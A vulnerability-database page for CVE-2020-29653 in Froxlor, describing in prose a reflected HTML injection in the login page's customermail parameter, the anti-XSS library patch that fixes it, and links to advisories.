CVE-2020-29653
Description
Froxlor through 0.10.22 does not perform validation on user input passed in the customermail GET parameter. The value of this parameter is reflected in the login webpage, allowing the injection of arbitrary HTML tags.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
froxlor/froxlorPackagist | <= 0.10.22 | — |
Affected products
2Patches
Vulnerability mechanics
Root cause
"Missing input validation on the customermail GET parameter allows arbitrary HTML/JavaScript injection into the login page output."
Attack vector
An attacker crafts a URL containing malicious HTML or JavaScript in the `customermail` GET parameter and sends it to a victim. When the victim visits that URL, Froxlor's login page reflects the unvalidated input directly into the HTML output [CWE-79]. The injected script executes in the victim's browser within the context of the Froxlor application, potentially allowing session hijacking, credential theft, or other client-side attacks. No authentication is required to trigger the reflection.
Affected code
The vulnerability exists in the login page of Froxlor through version 0.10.22. The `customermail` GET parameter is reflected directly in the login webpage without sanitization. The patch adds the `voku/anti-xss` library and integrates it into the codebase via `lib/FroxlorPhpHelper.php` [patch_id=1700469].
What the fix does
The patch adds the `voku/anti-xss` library as a dependency in `composer.json` and updates `composer.lock` accordingly [patch_id=1700469]. The commit message states "update dependencies and add voku\AntiXSS" [ref_id=1]. This library provides server-side HTML sanitization that neutralizes malicious HTML tags and JavaScript in user-supplied input before it is rendered in the login page, closing the reflected XSS vector.
Preconditions
- inputThe attacker must trick a victim into visiting a crafted URL containing malicious input in the customermail GET parameter.
- networkNo authentication or special network position is required; the login page is publicly accessible.
Generated on May 23, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
7- github.com/advisories/GHSA-j739-gw6q-f4c7ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2020-29653ghsaADVISORY
- github.com/Froxlor/Froxlor/commit/6bf5eccc2477257b6c1760a3c3784ae7e0554ce0ghsaWEB
- github.com/Froxlor/Froxlor/commits/mastermitrex_refsource_MISC
- github.com/Froxlor/Froxlor/security/advisoriesghsax_refsource_MISCWEB
- nozero.io/en/cve-2020-29653-froxlor-html-injection-dangling-markupghsaWEB
- nozero.io/en/cve-2020-29653-froxlor-html-injection-dangling-markup/mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.